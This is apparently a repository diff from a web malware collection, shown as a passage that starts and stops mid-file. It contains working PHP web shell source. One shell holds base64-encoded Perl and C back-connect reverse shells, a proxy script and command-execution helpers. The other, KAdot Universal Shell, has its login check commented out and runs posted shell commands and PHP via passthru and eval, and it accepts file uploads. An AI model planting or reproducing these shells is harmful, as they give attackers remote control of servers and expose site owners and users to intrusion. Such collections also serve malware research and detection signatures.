Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
$port[1] = "tcpmux (TCP Port Service Multiplexer)";
$port[2] = "Management Utility";
$port[3] = "Compression Process";
$port[5] = "rje (Remote Job Entry)";
$port[7] = "echo";
$port[9] = "discard";
$port[11] = "systat";
$port[13] = "daytime";
$port[15] = "netstat";
$port[17] = "quote of the day";
$port[18] = "send/rwp";
$port[19] = "character generator";
$port[20] = "ftp-data";
$port[21] = "ftp";
$port[22] = "ssh, pcAnywhere";
$port[23] = "Telnet";
$port[25] = "SMTP (Simple Mail Transfer)";
$port[27] = "ETRN (NSW User System FE)";
$port[29] = "MSG ICP";
$port[31] = "MSG Authentication";
$port[33] = "dsp (Display Support Protocol)";
$port[37] = "time";
$port[38] = "RAP (Route Access Protocol)";
$port[39] = "rlp (Resource Location Protocol)";
$port[41] = "Graphics";
$port[42] = "nameserv, WINS";
$port[43] = "whois, nickname";
$port[44] = "MPM FLAGS Protocol";
$port[45] = "Message Processing Module [recv]";
$port[46] = "MPM [default send]";
$port[47] = "NI FTP";
$port[48] = "Digital Audit Daemon";
$port[49] = "TACACS, Login Host Protocol";
$port[50] = "RMCP, re-mail-ck";
$port[53] = "DNS";
$port[57] = "MTP (any private terminal access)";
$port[59] = "NFILE";
$port[60] = "Unassigned";
$port[61] = "NI MAIL";
$port[62] = "ACA Services";
$port[63] = "whois++";
$port[64] = "Communications Integrator (CI)";
$port[65] = "TACACS-Database Service";
$port[66] = "Oracle SQL*NET";
$port[67] = "bootps (Bootstrap Protocol Server)";
$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
$port[69] = "Trivial File Transfer Protocol (tftp)";
$port[70] = "Gopher";
$port[71] = "Remote Job Service";
$port[72] = "Remote Job Service";
$port[73] = "Remote Job Service";
$port[74] = "Remote Job Service";
$port[75] = "any private dial out service";
$port[76] = "Distributed External Object Store";
$port[77] = "any private RJE service";
$port[78] = "vettcp";
$port[79] = "finger";
$port[80] = "World Wide Web HTTP";
$port[81] = "HOSTS2 Name Serve";
$port[82] = "XFER Utility";
$port[83] = "MIT ML Device";
$port[84] = "Common Trace Facility";
$port[85] = "MIT ML Device";
$port[86] = "Micro Focus Cobol";
$port[87] = "any private terminal link";
$port[88] = "Kerberos, WWW";
$port[89] = "SU/MIT Telnet Gateway";
$port[90] = "DNSIX Securit Attribute Token Map";
$port[91] = "MIT Dover Spooler";
$port[92] = "Network Printing Protocol";
$port[93] = "Device Control Protocol";
$port[94] = "Tivoli Object Dispatcher";
$port[95] = "supdup";
$port[96] = "DIXIE";
$port[98] = "linuxconf";
$port[99] = "Metagram Relay";
$port[100] = "[unauthorized use]";
$port[101] = "HOSTNAME";
$port[102] = "ISO, X.400, ITOT";
$port[103] = "Genesis Point-to-Point";
$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
$port[105] = "CCSO name server protocol";
$port[106] = "poppassd";
$port[107] = "Remote Telnet Service";
$port[108] = "SNA Gateway Access Server";
$port[109] = "POP2";
$port[110] = "POP3";
$port[111] = "Sun RPC Portmapper";
$port[112] = "McIDAS Data Transmission Protocol";
$port[113] = "Authentication Service";
$port[115] = "sftp (Simple File Transfer Protocol)";
$port[116] = "ANSA REX Notify";
$port[117] = "UUCP Path Service";
$port[118] = "SQL Services";
$port[119] = "NNTP";
$port[120] = "CFDP";
$port[123] = "NTP";
$port[124] = "SecureID";
$port[129] = "PWDGEN";
$port[133] = "statsrv";
$port[135] = "loc-srv/epmap";
$port[137] = "netbios-ns";
$port[138] = "netbios-dgm (UDP)";
$port[139] = "NetBIOS";
$port[143] = "IMAP";
$port[144] = "NewS";
$port[150] = "SQL-NET";
$port[152] = "BFTP";
$port[153] = "SGMP";
$port[156] = "SQL Service";
$port[161] = "SNMP";
$port[175] = "vmnet";
$port[177] = "XDMCP";
$port[178] = "NextStep Window Server";
$port[179] = "BGP";
$port[180] = "SLmail admin";
$port[199] = "smux";
$port[210] = "Z39.50";
$port[213] = "IPX";
$port[218] = "MPP";
$port[220] = "IMAP3";
$port[256] = "RAP";
$port[257] = "Secure Electronic Transaction";
$port[258] = "Yak Winsock Personal Chat";
$port[259] = "ESRO";
$port[264] = "FW1_topo";
$port[311] = "Apple WebAdmin";
$port[350] = "MATIP type A";
$port[351] = "MATIP type B";
$port[363] = "RSVP tunnel";
$port[366] = "ODMR (On-Demand Mail Relay)";
$port[371] = "Clearcase";
$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
$port[389] = "LDAP";
$port[407] = "Timbuktu";
$port[427] = "Server Location";
$port[434] = "Mobile IP";
$port[443] = "ssl";
$port[444] = "snpp, Simple Network Paging Protocol";
$port[445] = "SMB";
$port[458] = "QuickTime TV/Conferencing";
$port[468] = "Photuris";
$port[475] = "tcpnethaspsrv";
$port[500] = "ISAKMP, pluto";
$port[511] = "mynet-as";
$port[512] = "biff, rexec";
$port[513] = "who, rlogin";
$port[514] = "syslog, rsh";
$port[515] = "lp, lpr, line printer";
$port[517] = "talk";
$port[520] = "RIP (Routing Information Protocol)";
$port[521] = "RIPng";
$port[522] = "ULS";
$port[531] = "IRC";
$port[543] = "KLogin, AppleShare over IP";
$port[545] = "QuickTime";
$port[548] = "AFP";
$port[554] = "Real Time Streaming Protocol";
$port[555] = "phAse Zero";
$port[563] = "NNTP over SSL";
$port[575] = "VEMMI";
$port[581] = "Bundle Discovery Protocol";
$port[593] = "MS-RPC";
$port[608] = "SIFT/UFT";
$port[626] = "Apple ASIA";
$port[631] = "IPP (Internet Printing Protocol)";
$port[635] = "RLZ DBase";
$port[636] = "sldap";
$port[642] = "EMSD";
$port[648] = "RRP (NSI Registry Registrar Protocol)";
$port[655] = "tinc";
$port[660] = "Apple MacOS Server Admin";
$port[666] = "Doom";
$port[674] = "ACAP";
$port[687] = "AppleShare IP Registry";
$port[700] = "buddyphone";
$port[705] = "AgentX for SNMP";
$port[901] = "swat, realsecure";
$port[993] = "s-imap";
$port[995] = "s-pop";
$port[1024] = "Reserved";
$port[1025] = "network blackjack";
$port[1062] = "Veracity";
$port[1080] = "SOCKS";
$port[1085] = "WebObjects";
$port[1227] = "DNS2Go";
$port[1243] = "SubSeven";
$port[1338] = "Millennium Worm";
$port[1352] = "Lotus Notes";
$port[1381] = "Apple Network License Manager";
$port[1417] = "Timbuktu Service 1 Port";
$port[1418] = "Timbuktu Service 2 Port";
$port[1419] = "Timbuktu Service 3 Port";
$port[1420] = "Timbuktu Service 4 Port";
$port[1433] = "Microsoft SQL Server";
$port[1434] = "Microsoft SQL Monitor";
$port[1477] = "ms-sna-server";
$port[1478] = "ms-sna-base";
$port[1490] = "insitu-conf";
$port[1494] = "Citrix ICA Protocol";
$port[1498] = "Watcom-SQL";
$port[1500] = "VLSI License Manager";
$port[1503] = "T.120";
$port[1521] = "Oracle SQL";
$port[1522] = "Ricardo North America License Manager";
$port[1524] = "ingres";
$port[1525] = "prospero";
$port[1526] = "prospero";
$port[1527] = "tlisrv";
$port[1529] = "oracle";
$port[1547] = "laplink";
$port[1604] = "Citrix ICA, MS Terminal Server";
$port[1645] = "RADIUS Authentication";
$port[1646] = "RADIUS Accounting";
$port[1680] = "Carbon Copy";
$port[1701] = "L2TP/LSF";
$port[1717] = "Convoy";
$port[1720] = "H.323/Q.931";
$port[1723] = "PPTP control port";
$port[1731] = "MSICCP";
$port[1755] = "Windows Media .asf";
$port[1758] = "TFTP multicast";
$port[1761] = "cft-0";
$port[1762] = "cft-1";
$port[1763] = "cft-2";
$port[1764] = "cft-3";
$port[1765] = "cft-4";
$port[1766] = "cft-5";
$port[1767] = "cft-6";
$port[1808] = "Oracle-VP2";
$port[1812] = "RADIUS server";
$port[1813] = "RADIUS accounting";
$port[1818] = "ETFTP";
$port[1973] = "DLSw DCAP/DRAP";
$port[1985] = "HSRP";
$port[1999] = "Cisco AUTH";
$port[2001] = "glimpse";
$port[2049] = "NFS";
$port[2064] = "distributed.net";
$port[2065] = "DLSw";
$port[2066] = "DLSw";
$port[2106] = "MZAP";
$port[2140] = "DeepThroat";
$port[2301] = "Compaq Insight Management Web Agents";
$port[2327] = "Netscape Conference";
$port[2336] = "Apple UG Control";
$port[2427] = "MGCP gateway";
$port[2504] = "WLBS";
$port[2535] = "MADCAP";
$port[2543] = "sip";
$port[2592] = "netrek";
$port[2727] = "MGCP call agent";
$port[2628] = "DICT";
$port[2998] = "ISS Real Secure Console Service Port";
$port[3000] = "Firstclass";
$port[3001] = "Redwood Broker";
$port[3031] = "Apple AgentVU";
$port[3128] = "squid";
$port[3130] = "ICP";
$port[3150] = "DeepThroat";
$port[3264] = "ccmail";
$port[3283] = "Apple NetAssitant";
$port[3288] = "COPS";
$port[3305] = "ODETTE";
$port[3306] = "mySQL";
$port[3389] = "RDP Protocol (Terminal Server)";
$port[3521] = "netrek";
$port[4000] = "icq, command-n-conquer and shell nfm";
$port[4321] = "rwhois";
$port[4333] = "mSQL";
$port[4444] = "KRB524";
$port[4827] = "HTCP";
$port[5002] = "radio free ethernet";
$port[5004] = "RTP";
$port[5005] = "RTP";
$port[5010] = "Yahoo! Messenger";
$port[5050] = "multimedia conference control tool";
$port[5060] = "SIP";
$port[5150] = "Ascend Tunnel Management Protocol";
$port[5190] = "AIM";
$port[5500] = "securid";
$port[5501] = "securidprop";
$port[5423] = "Apple VirtualUser";
$port[5555] = "Personal Agent";
$port[5631] = "PCAnywhere data";
$port[5632] = "PCAnywhere";
$port[5678] = "Remote Replication Agent Connection";
$port[5800] = "VNC";
$port[5801] = "VNC";
$port[5900] = "VNC";
$port[5901] = "VNC";
$port[6000] = "X Windows";
$port[6112] = "BattleNet";
$port[6502] = "Netscape Conference";
$port[6667] = "IRC";
$port[6670] = "VocalTec Internet Phone, DeepThroat";
$port[6699] = "napster";
$port[6776] = "Sub7";
$port[6970] = "RTP";
$port[7007] = "MSBD, Windows Media encoder";
$port[7070] = "RealServer/QuickTime";
$port[7777] = "cbt";
$port[7778] = "Unreal";
$port[7648] = "CU-SeeMe";
$port[7649] = "CU-SeeMe";
$port[8000] = "iRDMI/Shoutcast Server";
$port[8010] = "WinGate 2.1";
$port[8080] = "HTTP";
$port[8181] = "HTTP";
$port[8383] = "IMail WWW";
$port[8875] = "napster";
$port[8888] = "napster";
$port[8889] = "Desktop Data TCP 1";
$port[8890] = "Desktop Data TCP 2";
$port[8891] = "Desktop Data TCP 3: NESS application";
$port[8892] = "Desktop Data TCP 4: FARM product";
$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
$port[8894] = "Desktop Data TCP 6: COAL application";
$port[9000] = "CSlistener";
$port[10008] = "cheese worm";
$port[11371] = "PGP 5 Keyserver";
$port[13223] = "PowWow";
$port[13224] = "PowWow";
$port[14237] = "Palm";
$port[14238] = "Palm";
$port[18888] = "LiquidAudio";
$port[21157] = "Activision";
$port[22555] = "Vocaltec Web Conference";
$port[23213] = "PowWow";
$port[23214] = "PowWow";
$port[23456] = "EvilFTP";
$port[26000] = "Quake";
$port[27001] = "QuakeWorld";
$port[27010] = "Half-Life";
$port[27015] = "Half-Life";
$port[27960] = "QuakeIII";
$port[30029] = "AOL Admin";
$port[31337] = "Back Orifice";
$port[32777] = "rpc.walld";
$port[45000] = "Cisco NetRanger postofficed";
$port[32773] = "rpc bserverd";
$port[32776] = "rpc.spray";
$port[32779] = "rpc.cmsd";
$port[38036] = "timestep";
$port[40193] = "Novell";
$port[41524] = "arcserve discovery";
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
function rep_char($ch,$count) //Ïîâòîðåíèå ñèìâîëà
{
$res="";
for($i=0; $i<=$count; ++$i){
$res.=$ch."";
}
return $res;
}
function ex($comd) //Âûïîëíåíèå êîìàíäû
{
$res = '';
if (!empty($comd)){
if(function_exists('exec')){
exec($comd,$res);
$res=implode("\n",$res);
}elseif(function_exists('shell_exec')){
$res=shell_exec($comd);
}elseif(function_exists('system')){
ob_start();
system($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(function_exists('passthru')){
ob_start();
passthru($comd);
$res=ob_get_contents();
ob_end_clean();
}elseif(is_resource($f=popen($comd,"r"))){
$res = "";
while(!feof($f)) { $res.=fread($f,1024); }
pclose($f);
}
}
return $res;
}
function sysinfo() //Âûâîä SYSINFO
{
global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
echo("<b><font face=Verdana size=2> System information:<br><font size=-2>
<hr>");
echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
("Safe Mode: </b><font color=red>OFF</font><b> "));
$row_dis_func=explode(', ',$dis_func);
echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
echo ("MySQL: </b>");
if($mysql_stat){
echo "<font color=green>ON </font><b>";
}
else {
echo "<font color=red>OFF </font><b>";
}
echo "cURL: </b>";
if($curl_on){
echo "<font color=green>ON</font><b><br>";
}else
echo "<font color=red>OFF</font><b><br>";
if ($dis_func!=""){
echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
}
$uname=ex('uname -a');
echo "OS: </b><font color=blue>";
if (empty($uname)){
echo (php_uname()."</font><br><b>");
}else
echo $uname."</font><br><b>";
$id = ex('id');
echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
echo "id: </b><font color=blue>";
if (!empty($id)){
echo $id."</font><br><b>";
}else
echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
"</font><br><b>";
echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
}
echo "<hr size=3 color=black>";
echo "</font></font>";
}
function read_dir($dir) //÷èòàåì ïàïêó
{
$d=opendir($dir);
$i=0;
while($r=readdir($d)){
$res[$i]=$r;
$i++;
}
return $res;
}
function permissions($mode,$file) { //îïðåäåëåíèå ñâîéñòâ
$type=filetype($file);
$perms=$type[0];
$perms.=($mode & 00400) ? "r" : "-";
$perms.=($mode & 00200) ? "w" : "-";
$perms.=($mode & 00100) ? "x" : "-";
$perms.=($mode & 00040) ? "r" : "-";
$perms.=($mode & 00020) ? "w" : "-";
$perms.=($mode & 00010) ? "x" : "-";
$perms.=($mode & 00004) ? "r" : "-";
$perms.=($mode & 00002) ? "w" : "-";
$perms.=($mode & 00001) ? "x" : "-";
$perms.="(".$mode.")";
return $perms;
}
function open_file($fil, $m, $d) //Îòêðûòü ôàéë
{
if (!($fp=fopen($fil,$m))) {
$res="Error opening file!\n";
}else{
ob_start();
readfile($fil);
$res=ob_get_contents();
ob_end_clean();
if (!(fclose($fp))){
$res="ERROR CLOSE";
}
}
echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
echo "<table BORDER=1 align=center>";
echo "<tr><td alling=center><b> ".$fil." </b></td></tr>";
echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
echo $res;
echo "

6944
web-malware-collection-13-06-2012/PHP/GNY.Shell.v1.1.txt Normal file
View file

File diff suppressed because one or more lines are too long

229
web-malware-collection-13-06-2012/PHP/KAdot Universal Shell v0.1.6.php Normal file
View file

@ -0,0 +1,229 @@
<!--
/+--------------------------------+\
| KA_uShell |
| <KAdot Universal Shell> |
| Version 0.1.6 |
| 13.03.04 |
| Author: KAdot <KAdot@ngs.ru> |
|--------------------------------|
\+ +/
-->
<html>
<head>
<title>KA_uShell 0.1.6</title>
<style type="text/css">
<!--
body, table{font-family:Verdana; font-size:12px;}
table {background-color:#EAEAEA; border-width:0px;}
b {font-family:Arial; font-size:15px;}
a{text-decoration:none;}
-->
</style>
</head>
<body>
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
// Configuration
$login = "admin";
$pass = "123";
/*/ Authentication
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="KA_uShell"');
header('HTTP/1.0 401 Unauthorized');
exit;}
else {
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
{ echo "×òî íàäî?"; exit;}
}
*/
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
// Menu
echo "
|<a href=$self?ac=shell>Shell</a>|
|<a href=$self?ac=upload>File Upload</a>|
|<a href=$self?ac=tools>Tools</a>|
|<a href=$self?ac=eval>PHP Eval Code</a>|
|<a href=$self?ac=whois>Whois</a>|
<br><br><br><pre>";
switch($ac) {
// Shell
case "shell":
echo <<<HTML
<b>Shell</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
</td></tr>
<tr><td>
<textarea cols="100" rows="25">
HTML;
if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
break;
//PHP Eval Code execution
case "eval":
echo <<<HTML
<b>PHP Eval Code</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="eval">
<tr>
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
</tr>
<tr>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (isset($_POST['ephp'])){
eval($_POST['ephp']);
}
break;
//Text tools
case "tools":
echo <<<HTML
<b>Tools</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="tools">
<tr>
<td>
<input type="radio" name="tac" value="1">B64 Decode<br>
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
<input type="radio" name="tac" value="3">md5 Hash
</td>
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) {
case "1":
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
break;
case "2":
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
break;
case "3":
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;
// Uploading
case "upload":
echo <<<HTML
<b>File Upload</b>
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
